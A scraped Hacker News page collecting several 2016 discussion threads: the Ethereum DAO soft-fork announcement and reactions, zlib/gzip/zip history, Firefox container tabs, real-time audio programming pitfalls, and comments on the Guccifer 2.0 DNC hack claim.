The development community is proposing a soft fork, (with NO ROLLBACK; no transactions or blocks will be reversed) which will make any transactions that make any calls/callcodes/delegatecalls that execute code with code hash 0x7278d050619a624f84f51987149ddb439cdaadfba5966f7cfaea7ad44340a4ba (ie. the DAO and children) lead to the transaction (not just the call, the transaction) being invalid, starting from block 1760000 (precise block number subject to change up until the point the code is released), preventing the ether from being withdrawn by the attacker past the 27-day window. This will later be followed up by a hard fork which will give token holders the ability to recover their ether.

Miners and mining pools should resume allowing transactions as normal, wait for the soft fork code and stand ready to download and run it if they agree with this path forward for the Ethereum ecosystem. DAO token holders and ethereum users should sit tight and remain calm. Exchanges should feel safe in resuming trading ETH.

Contract authors should take care to (1) be very careful about recursive call bugs, and listen to advice from the Ethereum contract programming community that will likely be forthcoming in the next week on mitigating such bugs, and (2) avoid creating contracts that contain more than ~$10m worth of value, with the exception of sub-token contracts and other systems whose value is itself defined by social consensus outside of the Ethereum platform, and which can be easily hard forked via community consensus if a bug emerges (eg. MKR), at least until the community gains more experience with bug mitigation and/or better tools are developed.

Developers, cryptographers and computer scientists should note that any high-level tools (including IDEs, formal verification, debuggers, symbolic execution) that make it easy to write safe smart contracts on Ethereum are prime candidates for DevGrants, Blockchain Labs grants and Strings autonomous finance grants.

Vitalik Buterin

76
ZenoArrow 17 hours ago 0 replies      
Whilst it's bad that people's money is being stolen, this could end up being a good thing for cryptocurrencies. Investors burned by this will certainly be demanding more robust security around cryptocurrencies in the future.
77
8ig8 15 hours ago 0 replies      
78
infodroid 15 hours ago 0 replies      
This is what happens when you are the first cryptocurrency with a Turing complete scripting language.
80
fabled_giraffe 17 hours ago 0 replies      
I suggest putting money into the stock market instead. It's much more consistent, e.g. http://finance.yahoo.com/echarts?s=%5EGSPC+Interactive#symbo...
81
known 19 hours ago 1 reply      
82
Annatar 17 hours ago 1 reply      
EtherScan is a Block Explorer and Analytics Platform for Ethereum, which is a decentralized platform that runs smart contracts.

What is this platform??? What is "DAO"??? What are "Uncles"??? What is "Ethereum"???

83
arisAlexis 17 hours ago 0 replies      
So the attacker can buy very cheap eth/dao right now, then somehow stop/reverse the attack/send money back/claim it was white hacking and effectively launder all the money he gained legitimately.
84
newobj 11 hours ago 0 replies      
"Put a fork in it"
85
powera 6 hours ago 0 replies      
I always thought nobody had any actual plans as to how the DAO could do anything useful.

Now I guess we know it won't. Either "hackers" will bankrupt it, or all the decentralization zealots will back out (and bankrupt it).

86
dreamdu5t 12 hours ago 0 replies      
The hacker should sue them for violating the contract by trying to fork and block him!
87
pmorici 19 hours ago 0 replies      
This can't be good for the price of ETH.
88
CyberDildonics 15 hours ago 0 replies      
While it is easy to cherry pick past comments and pretend it was insight instead of luck, I have to say my intuition was pretty quickly validated that so much money in something so untested and complicated was excessively risky:

https://news.ycombinator.com/threads?id=CyberDildonics&next=...

89
imaginenore 16 hours ago 0 replies      
They are proposing a soft fork for one specific case and one specific hash. It's a house of cards.
90
koolba 15 hours ago 1 reply      
What else did people expect would happen if you give them an arsenal of loaded foot guns?
91
vegabook 16 hours ago 1 reply      
anyway Ethereum feels like a cult. There's something weirdly disturbing for me about the ethos of blockchain technology, and how it jarrs with "The DAO" (note the capitalised definite article. There Is Only One. Hardly distributed or democratic). Also look at how a bunch of ethereum shills pack its "Curator", for which, by the way, The DAO is "incredibly privileged"[1]. What? Your own organization is incredibly privileged that you appointed yourself to it?

Even the name "ethereum" is pretentious and showy, again anti-distributed ethos.

I don't get a strong comfort level that this organization is any better than the current central banks.

[1] https://daohub.org/curator.html

92
homakov 17 hours ago 0 replies      
Isn't it race condition?
93
yoloswag1 18 hours ago 1 reply      
Anyone know how to short ETH?
94
howfun 19 hours ago 3 replies      
Site don't open.
95
nickpsecurity 12 hours ago 0 replies      
This is an example of why I created my mantra for high-assurance security: "tried and true beats novel and new." Another is to wait at least 10 years for specific tech and techniques to prove themselves out before betting lives or entire businesses on them (startups an exception).

The blockchain and DAO models are very new. They introduce new mathematical constructs, complex code, security issues we haven't thought about, coordination among many for such issues, and so no. Ethereum even includes an interpreter or something, which has its own set of risks. So, I refused to bet on such models given enormous risk means stuff is going to happen to them that isn't going to happen to regular, financial processing. We also have mitigations for most of its risks.

Today is a good example. This is the kind of thing you're not going to see the Federal Reserve, VISA/Mastercard, most banks, or even large eCommerce sites announce. It probably won't be the last announcement of an unusual issue. So, anyone wanting stable currency + commerce should avoid stuff like Ethereum unless they're just investing small amounts to help them experiment & improve. Risk/reward doesn't make sense on such immature tech.

96
reddytowns 16 hours ago 0 replies      
Update, the coins stolen can't be spent for 27 days and Vitalik (one of the creators of ethereum) is proposing a fork to refund the ether. https://steemit.com/ethereum/@vladislav/critical-update-re-d...
97
goldenkey 19 hours ago 0 replies      
Article about The DAO since parent link is flakey: http://www.coindesk.com/the-dao-just-raised-50-million-but-w...
98
y04nn 19 hours ago 0 replies      
That sounds pretty bad
99
specialist 12 hours ago 3 replies      
"The "hacker" simply used the DAO as it was meant to be used ... and deserves the funds."

Exactly. DAO is CoreWar meets Nomic.

https://en.wikipedia.org/wiki/Core_War

https://en.wikipedia.org/wiki/Nomic

Designers of rulesets (laws, board games, markets, control systems) ignoring Gdel's incompleteness theorems should themselves be ignored. Just like we ignore inventors of perpetual motion machines who ignore the laws of thermodynamics.

https://en.wikipedia.org/wiki/Gdel%27s_incompleteness_theor...

100
janan11 18 hours ago 0 replies      
They are returned to the wallet they were sent from. It would then be up to the exchange to manually refund the ETH
101
jeanduluoz 12 hours ago 1 reply      
Looks like security agencies are placing extra guards at important national security sites like the statue of liberty, NSA, and Best Buy: http://i.imgur.com/5c9H6DO.gif
102
gwbas1c 15 hours ago 0 replies      
Hahaha! Let me go refill my popcorn!
103
varav 18 hours ago 0 replies      
In case anybody is wondering how this happened, it looks like the attack is exploiting the "recursive call via default function" vulnerability [1].

[1]: http://vessenes.com/more-ethereum-attacks-race-to-empty-is-t...

104
6d6b73 15 hours ago 3 replies      
Hm, I wonder why people are panicking over virtual money and acting like they've lost something tangible. It's like crying over Monopoly dollars. :)
12
How are zlib, gzip and Zip related? (2013) stackoverflow.com
437 points by yurisagalov  11 hours ago   100 comments top 16
1
lpage 7 hours ago 3 replies      
In other compression news, Apple open sourced their implementation of lzfse yesterday: https://github.com/lzfse/lzfse. It's based on a relatively new type of coding - asymmetric numeral systems. Huffman coding is only optimal if you consider one bit as the smallest unit of information. ANS (and more broadly, arithmetic coding) allows for fractional bits and gets closer to the Shannon limit. It's also simpler to implement than (real world) Huffman.

Unfortunately, most open source implementations of ANS are not highly optimized and quite division heavy, so they lag on speed benchmarks. Apple's implementation looks pretty good (they're using it in OS X, err, macOS, and iOS) and there's some promising academic work being done on better implementations (optimizing Huffman for x86, ARM, and FPGA is a pretty well studied problem). The compression story is still being written.

2
chickenbane 9 hours ago 4 replies      
Not only is this a great read, but the follow up for citations is replied with "I am the reference".

If this were reddit I'd post the hot fire gif. Eh, here it's anyway: http://i.imgur.com/VQLGJOL.gif

3
sikhnerd 9 hours ago 2 replies      
It's annoyingly common how the OP doesn't mark this answer as accepted, or even acknowledge how amazing this answer is from one of the technology's creators -- instead just goes on to ask a followup.
4
kbenson 9 hours ago 3 replies      
It seems like it wouldn't be that hard to create an indexed tar.gz format that's backwards compatible.

One way would be to use the last file in the tar as the index, and as files are added, you can remove the index, append the new file, append some basic file metadata and the compressed offset (maybe of the deflate chunk) into the index, update the index size in bytes in a small footer at the end of the index, and append to the compressed tar (add).

You can retrieve the index by starting at the end of the compressed archive, and reading backwards until you find a deflate header (at most 65k plus a few more bytes, since that's the size of a deflate chunk), If it's an indexed tar, the last file will be the index, and the end of the index will be a footer with the index size (so you know the maximum you'll need to seek back from the end). This isn't extremely efficient, but it is limited in scope, and helped by knowing the index size.

You could verify the index by checking some or all of the reported file byte offsets. Worst case scenario is small files with one or more per deflate chunk, and you would have to visit each chunk. This makes the worst case scenario equivalent to listing files an un-indexed tar.gz, plus the overhead of locating and reading the index (relatively small).

Uncompressing the archive as a regular tar.gz would result in a normal operation, with an additional file (the index) included.

I imagine this isn't popular is not because it hasn't been done, but because most people don't really need an index.

5
rdslw 8 hours ago 1 reply      
Worth reading answer about coolest kid on the block: xz compression algorithm (of lzma fame) plus tar.gz vs tar.xz scenarios/discussion.

http://stackoverflow.com/questions/6493270/why-is-tar-gz-sti...

6
winterismute 6 hours ago 0 replies      
My father teaching me to type PKUNZIP on files that "ended with .zip" in the DOS shell (not long before the Norton Commander kind of GUI arrived to our computer) is one of my earliest memories as a toddler: I would ask him "What does it mean?" and he would simply not know. It was 1990 and I was 3 and a half I think. When I learned what it stood for it was kind of epic, for me.
7
hardwaresofton 5 hours ago 0 replies      
It is rare to be able to have a question answered so completely and from such a first-hand source. This post is gold and tickles me in all the right places.

StackOverflow is sitting on a veritable treasure trove of knowledge.

8
the_common_man 9 hours ago 2 replies      
One important difference in practice is that zip files needs to be saved to disk to be extracted. gzip files on the other hand can be stream unzipped i.e curl http://example.com/foo.tar.gz | tar zxvf - is possible but not with zip files. I am not sure if this is a limitation of the unzip tool. I would love to know if there is a work around to this.
9
404-universe 9 hours ago 4 replies      
Where do the other popular compression utilities (e.g. bzip2, xzip, lzma, 7zip) fit in to this?
10
tdicola 8 hours ago 4 replies      
Wow a stackoverflow question that hasn't been closed or removed for some trivial reason--thought I'd never see something like that again.
11
minionslave 9 hours ago 3 replies      
It's kinda bad-ass when he said: you can use this text on Wikipedia, I'm the primary reference.
12
coryfklein 5 hours ago 0 replies      
I love the discussion in the comments:

> This post is packed with so much history and information that I feel like some citations need be added incase people try to reference this post as an information source. Though if this information is reflected somewhere with citations like Wikipedia, a link to such similar cited work would be appreciated. - ThorSummoner

> I am the reference, having been part of all of that. This post could be cited in Wikipedia as an original source. Mark Adler

13
virtualized 8 hours ago 5 replies      
But can he invert a binary tree and is he willing to relocate to San Francisco?
14
adontz 8 hours ago 1 reply      
When I read "I am the reference" it reminded me of "I am the danger".

https://www.youtube.com/watch?v=3v_zlyHgazs

15
new_hackers 5 hours ago 0 replies      
When Chuck Norris computes checksums, he uses Adler-32
16
agumonkey 9 hours ago 2 replies      
Archived link juste in case http://archive.is/SvUO5
13
Contextual Identities on the Web mozilla.org
537 points by ronjouch  1 day ago   134 comments top 53
1
amluto 1 day ago 5 replies      
If we can get Tor Browser's first party origin feature in as well, this will be fantastic! I would love to have the ability to type www.facebook.com and get a context that isn't linked to the rest of my tabs.

I also want ephemeral containers so I could open a tab that forgets its cookies when I'm done. Think private browsing but without forgetting my history, requiring a new window, or being limited to one context at a time.

2
fps 1 day ago 3 replies      
Firefox's clumsy profile support is the one thing that makes me keep switching back to chrome. I really prefer firefox sync to chrome's implementation, and some of firefox's tab organization tools are way better than chrome's. But I use many of the same webapps in my personal life as I do in my work life, and being able to run two profiles simultaneously, and start them up without having to launch firefox from the terminal every time, was difficult.

What they've implemented seems to be better than chrome's profiles, in that it's easier to create a new profile for a specific context (so I don't have to sort things into a "work" bucket and a "personal" bucket.) It will be interesting to see how the contexts interact with plugins.

3
red_admiral 1 day ago 3 replies      
This could not be more welcome at a time when facebook (UK) is displaying a new bar across the top of its page saying that by using it, I agree:

"By clicking or navigating the site, you agree to allow our collection of information on and off Facebook through cookies."

I already have a separate chromium "person" set up for facebook; might give firefox another go when this gets released.

4
masklinn 1 day ago 4 replies      
That looks neat. And if it were possible to cheaply create and delete contextual identities on the fly it would even fix an issue I had today: the difficulty of multiple separate private browsing sessions in the same browser.
5
breakingcups 1 day ago 0 replies      
This seems very useful for it's intended use-case. At first glance I would like to note however that advertisers (and other parties) will probably still be able to track you across these "containers", due to not isolating HSTS-flags and similar features.

I also wonder whether a seperate banking container makes a lot of sense when doing online payments, as in my country we get redirected to our bank to do payments. This might create confusion among non tech-savy users ("but this should be in my banking-container, I'll just switch. Why does the webshop give an error upon returning now?").

Overall a really cool feature though and one that might persuade me to give Firefox a try as daily driver again.

6
BugsBunnySan 1 day ago 2 replies      
Omg, finally this exists :D

I think this is the actual solution to the problem that 'private browsing' was trying to fix when it first came out.

7
beagle3 1 day ago 0 replies      
This is a great step in the right direction -- though it is not enough. Different identities would still be going through the same IP (not much one can do about that). But some things that can be solved are NOT addressed with containers:

- everything panopticlick uses (fonts list, plugin lists, timezone, agent, etc.)

- everything panopticlick doesn't use, but the bad guys do (aa font signatures, ...)

- plugin abuse - e.g., Flash 'cookies', Silverlight 'isolated storage', Java JNLP properties

- see EverCookie[0] for more things that have been known to occur in the wild (and remember it is outdated). the article mentions cache is not shared, but e.g. HSTS pinning is. evercookie easily pierces through this system.

Since 2005 or so, I have had different users for different purposes; Not sure how well it works on Windows these days (it used to not work at all back in 2005) - but on Linux, it's just a "sux - otheruser" or "sudo -u otheruser" command away, and it is well isolated on the web side[1]

[0] https://samy.pl/evercookie/

[1] Full X11 isolation requires a lot more effort - but luckily it seems that recent browsers don't let websites abuse that

8
Monkey0x9 1 day ago 1 reply      
This is the way to go for firefox. Instead of copying google chrome, creating new and usefull features.
9
yAnonymous 1 day ago 2 replies      
Vote-brigading and trolling have never been so easy! All sarcasm aside, it is a great feature.
10
james-turner 1 day ago 0 replies      
This looks really promising. The identity problem in browsers is something I tried to solve by customising the look of different Firefox instances opened with different profiles[1] (one for personal use, one for work etc). But having this functionality built in is definitely preferable.

[1] https://github.com/jamesturner/firefox-profile-indicator

11
WA 1 day ago 0 replies      
I solved this so far by using two different browsers. But this is cumbersome and Mozilla now makes sure that I only use their product. This is good, because I like Firefox.
12
lucb1e 1 day ago 1 reply      
This is fantastic! I've been wanting this for a few years, but didn't think anyone else would care enough to get this on a browser's todo list. Awesome to see Mozilla doing this!
13
azeirah 1 day ago 0 replies      
Oh that sure does seem really useful :o

I hope they keep going into this direction

14
mark_l_watson 1 day ago 0 replies      
Great idea that makes me glad I use Firefox (settings for maximum privacy and discard all cookies when browser shuts down; I also use Chrome for Google properties, Twitter and Facebook).

With Firefox containers I suppose I could drop my two Browser setup, but I won't, at least for now.

15
eliaspro 12 hours ago 0 replies      
This is like a match made in heaven for Activities in KDE Plasma.

http://cukic.co/2016/02/08/heavy-activities-setup/

Now if only Firefox AddOns/Extensions would be able to properly access DBus, this would allow for a so much better Linux integration (storing passwords through org.freedesktop.Secret, opening URLs in the appropriate container from KDE Plasma sessions instead of random switches to another activity where a Firefox window is found, global media playback states/control for web video/audio as org.mpris.MediaPlayer2, powermanagement inhibitors through org.freedesktop.login1, etc)

16
eximius 23 hours ago 0 replies      
This is a huge step in the right direction.

However, my personal vision is taking this one step further with an 'identity management' daemon running on your computer or a hardware token which acts a cryptographic agent on behalf of your identities. So firefox, chrome, or whatever application could request a credential for some service and your daemon would pop up and ask you which identity's credentials to use or if you'd like to make a new one (U2F or some other system).

17
notifier2050 1 day ago 0 replies      
Wow, this is insanely cool!I've been thinking to create add-on to be able to login to multiple Google accounts from different tabs, but they managed to create it faster!
18
LOSEYOURSELF 1 day ago 1 reply      
Isn't it kind of fucking horrific you have to think about your "browsing identity" at all?
19
greggman 1 day ago 1 reply      
Very cool.

I think I'd love to be able to define which domains open in which contexts so if I click a link that happens to be to something I want in other context ...

But that got me thinking just how effective will this be? If someone sends me a link in fb and I click it. Even if it opens in a new context it seems like it's only a matter of time before all the links are changed to https://destsite.com/path/to/resource#fbtrackingid or something similar which then adds the cookie across contexts?

20
Pxtl 1 day ago 0 replies      
I'm not sure about Firefox's implementation of it, but throughout computing I'm seeing more and more need for this kind of thing, not to mention something softer than full user-account switching for handing a device between family members or teammates. As everything gets more personalized and more tightly bound to the user by learning their habits and typing and voice and all that, and simultaneously in a social networking context we broadcast stuff about ourselves incidentally (like Youtube learning your viewing preferences and likes) that the ability to switch context neatly and quickly is becoming more important.
21
arenaninja 1 day ago 1 reply      
Very cool feature! I remember a friend of mine having a use for this as far back as 8 years ago. I hope you're happy now Richard!
22
nixpulvis 1 day ago 0 replies      
I literally just read the paper [1] a few days ago, pretty interesting. It lays out a lot of work and thought to be done.

[1] http://www.ieee-security.org/TC/W2SP/2013/papers/s1p2.pdf

23
Grue3 1 day ago 1 reply      
The idea is good, but what's with the identities they chose? "Personal", "Work", "Banking", "Shopping"? Is "Shopping" supposed to be an euphemism for "Porn"? As far as I can tell, nobody has a "shopping" Twitter account.
24
dubcanada 1 day ago 0 replies      
This actually looks awesome.
25
pc2g4d 1 day ago 0 replies      
Digital marketing companies are moving to reduce or eliminate their dependence on cookies for identifying users, so unless they add some Tor-like functionality to this tool that makes you appear to be connecting from a different IP address, I don't see this having much of a long-term privacy impact.

That said, no need to volunteer any more information than necessary to use online services.

If you haven't seen it, you should definitely check out https://panopticlick.eff.org/

26
MzHN 1 day ago 0 replies      
Ah yes, thank you, finally!

I can't emphasize enough how much I've been waiting for this.

I've even tried pushing it via the dev-tools uservoice as a developer tool instead of a privacy tool, since you often need to test with multiple sessions at the same time. No reaction.

There is still the very real issue of fingerprinting across containers, which they point at towards the end of the article, but this might just be enough for me to drop Chrome completely and get my Firefox set up again the way I like it.

27
natrius 1 day ago 0 replies      
This sounds better than my current solution of multiple Chrome profiles, but how does this interact with extensions? So many extensions require broad permissions that give them nearly as much power as the browser vendor themselves. With separate Chrome profiles, I can keep sketchy extensions away from sensitive credentials. I hope these containers do something similar, because I think the UX of per-tab containers might be superior to per-window profiles.
28
danbruc 1 day ago 0 replies      
Supported at least since IE 8 (2009) [1], not sure how multiple instances behaved before.

[1] https://blogs.msdn.microsoft.com/ie/2009/05/06/session-cooki...

29
pmontra 1 day ago 0 replies      
Wonderful. I'm looking forward to a feature to automatically create a container for every new tab, unless explicitly told to open a tab in the existing container. Example: two tabs for the same site, right click, Open Link in New Tab (same container). The browser default could be opening in the same container. An about:config switch would be ok, we'll find it.
30
return0 1 day ago 0 replies      
I prefer to use separate browser instances with different --user-data-dir (in chrome, i dont know the equivalent in firefox). Adding a different color theme helps to immediately discriminate betwen them.

Having tabs from different contexts in the same window is confusing.

31
kirkdouglas 1 day ago 1 reply      
It seems that Firefox is becoming relevant again.
32
kevinSuttle 1 day ago 0 replies      
This is pretty much spot on what Edward Snowden described for his vision of digital identity.

https://gist.github.com/mnot/382aca0b23b6bf082116

33
siscia 1 day ago 1 reply      
I am wondering what will happen to all the web ads company if this feature get deployed and use wildly.
34
skybrian 1 day ago 2 replies      
I'm pretty happy with Chrome's support for multiple profiles in separate windows - for example I have one for work and one just for Facebook. I wonder why Firefox is using tabs? What other differences are there between these approaches?
35
enscr 1 day ago 2 replies      
Is it like the Chrome "People" (or profiles or user) feature ? Suggesting that "user wont need to use multiple browsers" seems like a problem that didn't exist if you used chrome.
36
tener 1 day ago 0 replies      
Cool addition, but I can easily see how people will make costly mistakes by using different account than intended.

I prefer to use different devices entirely.

When need arises to have multiple logins to the same page I simply open new private window.

37
hammock 1 day ago 1 reply      
So this is like profiles but tab-level instead of window level?
38
ComodoHacker 1 day ago 0 replies      
Funny side thought. Privacy movement has one additional benefit besides all others: it pushes machine learning research further and further.
39
digi_owl 1 day ago 0 replies      
Perhaps they should have called it something other than containers? Or is the term a buzzword these days for anything that separates A from B?
40
srrge 1 day ago 0 replies      
As a developer I see a lot of use for this feature.
41
nickysielicki 1 day ago 0 replies      
This so closely resembles the way that Qubes uses colors to identify your VMs [1] that I'm surprise they didn't get a mention in the post.

It's a really simple idea that can go a long way for digital identity hygiene. Can't wait to try it out.

---

[1] Screenshot of Qubes: https://www.qubes-os.org/attachment/wiki/QubesScreenshots/r2...

42
rolandukor 1 day ago 0 replies      
I think this is fantastic. In hindsight, it is a no-brainer. Good for mozilla and hoping the others will catch up
43
neves 1 day ago 1 reply      
Great for paywalls that just allow me to read X articles. Now if I create 5 profiles in the site, I can read 10*X!
44
nikolay 1 day ago 0 replies      
Nice! Google Chrome has profiles, which are kinda similar, but this looks better!
45
ars 1 day ago 0 replies      
This reminds of tabgroups for some reason - but they got rid of tabgroups.

I think this feature would have made tabgroups much more useful.

46
Nadya 1 day ago 2 replies      
I am always confused by the lack of user customization in features like this. Why am I limited to four containers? Why can't I rename them?

Four is not enough (personally, though I imagine it would be for most people) and remembering which identity is under "Work" and which is under "Shopping" is just an annoyance when none of my identities would be for "Work" or "Shopping". It would be faster and less annoying to sign out and sign in as another account. Being able to name my containers after my psuedonyms and have a container for each psuedonym would make it infinitely more useful and intuitive for me - rather than a mental burden not worth the hassle of using.

47
mtgx 1 day ago 2 replies      
If they're going to use per-tab containers, doesn't it make sense to have per-tab sandboxing as well, to ensure there's no data leakage?
48
nomi137 1 day ago 0 replies      
this will be awesome.. and watch out google chrome :)
49
mxuribe 1 day ago 0 replies      
Pretty cool!
50
darkroasted 1 day ago 0 replies      
This is really neat, although it does not look slick enough to replace my own hacky word-around:

What I have been doing is creating a separate Chrome application launcher for my different life contexts -- http://lifehacker.com/5611711/create-application-shortcuts-i... I have one for anonymous browsing, one for work, one for personal-real-name, and one for pseudonymous browsing. I renamed the application so I can launch by typing "WorkChrome" or "PersonalChrome" in spotlight search. Each Chrome app then runs with a separate profile, separate cookies, etc. I have a different icon and colored theme for each one, so that I never make a mistake with regards to which I am browsing in. I can have multiple open at the same time and tab switch between them.

51
ronjouch 1 day ago 2 replies      
@HN @dang why the post de-rename?

When submitting, I intentionally editorialized the title from something unclear out of mozilla's blog context ("Contextual Identities on the Web") to a more explicit title that speaks by itself ("Firefox 50 nightly new feature: Contextual Identities").

Isn't this considered valuable here?

52
janan11 1 day ago 0 replies      
This is genuinely super! I've already configured my firefox so that fb exists best within the non-public context. This means i will visit any website which uses fb monitoring, and so forth, and that i won't be logged in!
53
aestetix 1 day ago 1 reply      
Mozilla and Contextual Identities.... hmm.... did they just forget about Persona?
14
Four common mistakes in audio development atastypixel.com
401 points by bpierre  2 days ago   203 comments top 22
1
dmytroi 2 days ago 5 replies      
I really love time restricted environments, in my opinion they truly liberate programmers: instead of using language/library/tech/pattern/etc-of-choice they suddenly realize "oh, we don't have time for that". Do we need GC? We don't have time for that. Do we need to allocate memory? We don't have time for that. Can we maybe do this enterprise-like tens thousands source code files OOP hierarchy thing? We don't have time for that.

Realtime forces people write less, writing only what actually matters, and all this in my opinion helps people to be better engineers (in-a-way). I just wish it looked more attractable for people - hacking your way out in time/resources constrained systems (like MCU's for example) can be as fun as hacking html/js to make your site behave as you want.

2
splatcollision 2 days ago 1 reply      
Just reading the intro so far, not an audio developer particularly, but wanted to quote this:

> although there is a high horse present in this article, consider me standing beside it pointing at it, rather than sitting on top of it.

Something we can all aspire to!

3
iammyIP 2 days ago 7 replies      
These mistakes basically boil down to not using slow scripting languages and making the core buffer loop run fast and undisturbed.For realtime synthesis use c or c++, optimise early, use trigonometry approximations in range -pi / pi, do not use lookup tables, they unnecessarily fill the cache, cpus are fast enough, write the core loop branchless, write for cache, use vectorisation and function pointers.Do not use anything fancy, simple int32_t, float and vector/array is enough (some filters need double precision though). Do not copy stuff, point to it. Precalculate what can be precalculated, e.g. dont do x / samplerate, do x * samplerate_inverse. Check for denormals.
4
exDM69 2 days ago 4 replies      
> It can be helpful to know that, on all modern processors, you can safety assign a value to a int, double, float, bool, BOOL or pointer variable on one thread, and read it on a different thread without worrying about tearing

This is true on the CPU side (for some CPUs) but what about compiler optimizations?

Using "volatile" should make stores and loads happen where they are written in the code, but can it be relied on in multi threaded use cases? It's generally frowned upon for a good reason, but perhaps it's acceptable if you're targetting a limited range of CPUs (the article seems to be focused on iOS and ARM only).

A safer bet would be to use __atomic_load and __atomic_store (from [0] or [1]) or C11 atomics if you have the appropriate headers for your platform. They provide safe loads and stores for all CPU architectures, and provide the appropriate memory barriers for cache coherency (for architectures that do care).

[0] https://gcc.gnu.org/onlinedocs/gcc/_005f_005fatomic-Builtins...[1] http://clang.llvm.org/docs/LanguageExtensions.html#langext-c...

5
radarsat1 2 days ago 2 replies      
Or just use FAUST: http://faudiostream.sf.net/

Seriously, check it out, it's awesome. Write your audio DSP in a language suited to it, compile to efficient C++ (among other languages) and optionally embed it in a (huge) variety of environments. (even Javascript for webaudio)

It's a functional description language that describes a DSP graph, and can generate block diagrams too. Not to mention, it has libraries containing any filter you can imagine. Highly recommended.

6
emiliobumachar 2 days ago 1 reply      
So, I assume none of those popular OS'es has priority inheritance[1].

Even though it's a concept from realtime computing, I though it would be widespread in general-purpose OS'es as well. Really, it seems like a useful feature for any OS that implements priority at all.

What would be the downsides of having it in a general-purpose OS?

The ones I can think of are development cost and processing overhead.

[1] https://en.wikipedia.org/wiki/Priority_inheritance

7
benwad 2 days ago 7 replies      
Since we seem to have a lot of audio programmers in here, does anyone have an opinion on using non-C/C++ languages for audio development? I've always used C/C++ but newer systems languages like Go and Rust (both have e.g. PortAudio support) seem quite well suited to the task.
8
aidos 2 days ago 2 replies      
> It can take just one glitch during a live performance for a musician to completely lose faith in their whole setup

I was an early adopter of digital vinyl (if you haven't seen it before, the records have a screechy signal that software can use to determine the position of the needle on the record, which it then maps to an audio file).

A friend of mine purchased the most popular unit at the time but it was really unreliable. It crashed once while a club full of people were dancing and that was the end of it for me. I switched to a unit by a small company (Serato) that had just been released (2004) and never looked back. The unit itself still works perfectly, there was a bug back in about 2008 that they tracked down and patched for me.

Apparently the original brand has now caught up technology-wise and they're a big player, but I will never, ever, ever buy their kit. Reliability issues with audio gear can completely destroy your trust.

9
sehugg 1 day ago 0 replies      
It kills me that it's 2016 and pulseaudio stutters when I move a window (at least on my system).
10
bartl 2 days ago 7 replies      
I'm a bit amazed he doesn't even mention [double buffering](https://en.wikipedia.org/wiki/Multiple_buffering), a system that was already used in old video games to avoid flicker, as a way to draw on scene screens and only pass it on to the video stage once the scene is complete.

All you would need here is 2 (or more) copies of the shared data structure and a few pointers to the data structure. You fill in a draft version of the data structure and only change the "read" pointer to point to it when it's ready. Changing that pointer is, I would hope, atomic. You can then change the "write" pointer to point to a different copy of the data structure to work on.

To make sure the client only reads consistent data, it can make a copy of that pointer before it starts processing, because the pointer itself might change.

Using 3 buffers instead of 2, and if you're sure the processing of a buffer takes less time than the switching cycle time, you can be sure your buffer data will not ever change in the meantime.

11
ukyrgf 2 days ago 1 reply      
I wasn't even aware I WAS living in a "post-Audiobus/IAA world". So these are... iPhone apps?
12
delinka 2 days ago 1 reply      
"Dont use Objective-C/Swift on the audio thread."

Nothing wrong with using Swift (the language) to render audio in realtime on the audio thread. I'd change the advice above to: don't send messages to Objective-C objects during your audio thread.

13
bwindels 2 days ago 3 replies      
Great article. Interesting that modifying and reading word-sized values is an atomic operation on ARM. IIRC on x86 this is not the case because values can be cached on the cache of the different cpu cores, and thus be out of sync. Does someone have a more detailed insight into this?
14
fenomas 2 days ago 2 replies      
> Any app that does audio has at least two threads of execution: the main thread, and the audio thread

As a side note, I sure wish browsers would hurry up and implement web audio workers so that this could be true for me!

15
camperman 2 days ago 1 reply      
I remember using a circular buffer for a MOD/S3M player I wrote many moons ago. I think you called a hardware interrupt to enable the Gravis or Soundblaster to read from a block of memory and send it out to the speakers at the right frequency, and then made sure that you fed enough data into the buffer. It wasn't even concurrent - every loop, just mix enough of the track to fill the buffer and write it. Simpler days...
16
cageface 2 days ago 0 replies      
I spent the better part of the last few years working on my own audio apps. It's definitely the most difficult programming domain I've worked in. Real time requirements + threading + low level code makes for a very challenging environment. But it's also a lot of fun. Using the tools the author describes here can save you a lot of headaches and let you focus more on the fun part though.
17
amelius 2 days ago 4 replies      
> If it doesnt, the buffer runs dry, and the user hears a nasty glitch or crackle: thats the hard transition from audio, to silence.

It would be awesome if we could prevent this crackle somehow on a lower level of abstraction. What I mean by that is that if the buffer runs dry, the hardware (or the OS/audio driver) could do some prediction in order to bridge any gaps in the audio more nicely.

18
JoeAltmaier 2 days ago 1 reply      
Another common mistake: off-by-one error. Even a single zero or duplicate sample value is clearly audible! Its amazing how sensitive we are to audio artifacts.
20
zongitsrinzler 2 days ago 0 replies      
What song is it in the 4sec sound clip. Sounds so familiar, like something from Daft Punk?
21
gradinafrica 2 days ago 0 replies      
The Firefly references in this article are on point.
22
tantalor 2 days ago 0 replies      
This is also true of animation threads.
15
Guccifer 2.0: DNC's servers hacked by a lone hacker guccifer2.wordpress.com
462 points by r721  2 days ago   158 comments top 25
1
Jerry2 2 days ago 10 replies      
The media (and CrowdStrike) blame Russians for it [0]. Heh... yet this blog and the hacker himself, says he did it alone. I guess it's easier to forgive incompetence if you blame the attack on some huge, powerful, resourceful, state-funded opponent. That's why every hacking report of some big organization or company today lays the blame on APTs, China, Russia, NORKs and so on.

Management is off the hook since they don't have to admit that they were hacked by some kid and the security company gets the prestige of 'fighting and outsmarting a state actor'. And everyone's job is more or less safe. Other companies and CIO/CSOs now know that 'Sec Company X' will cover their ass by shifting the blame on some huge entity. Company lawyers are also happy because the liability of such attacks will be less. And the cycle continues. Guccifer, for example, didn't even know how to program and he used his phone to hack [1].

Yes, APTs definitely do happen but I'd bet they happen a lot less frequently than the media and security companies would want us to believe.

[0] https://www.washingtonpost.com/world/national-security/russi...

[1] https://en.wikipedia.org/wiki/Guccifer#Computer_hacking_acti...

2
tptacek 2 days ago 1 reply      
I will reprise a comment from yesterday:

The only thing interesting about this story is that whoever did it "got caught". Sort of. Maybe.

Is there anyone here who really believes that every major campaign organization since, say, 2004 hasn't been completely owned up? What, you think the people that build the software and IT environments for campaigns --- sites that by design have millions of users with persistent accounts, and thousands of staff members at varying levels of privilege --- are the creme de la creme of software security talent?

Because, sure, I mean, everyone I know in software security and pentesting tells me "my first career choice is to go work in IT for the DNC and the GOP", but somehow along the way Google manages after a mighty struggle to outbid the 70k/year cost-center IT organizations offer for security talent.

If there was any interesting "oppo research" on McCain in the DNC servers during the '08 election, I will bet all the money in my pocket versus all the money in yours that the Chinese read all of it long before everyone on the official CC list did.

https://news.ycombinator.com/item?id=11903136

3
yanilkr 2 days ago 2 replies      
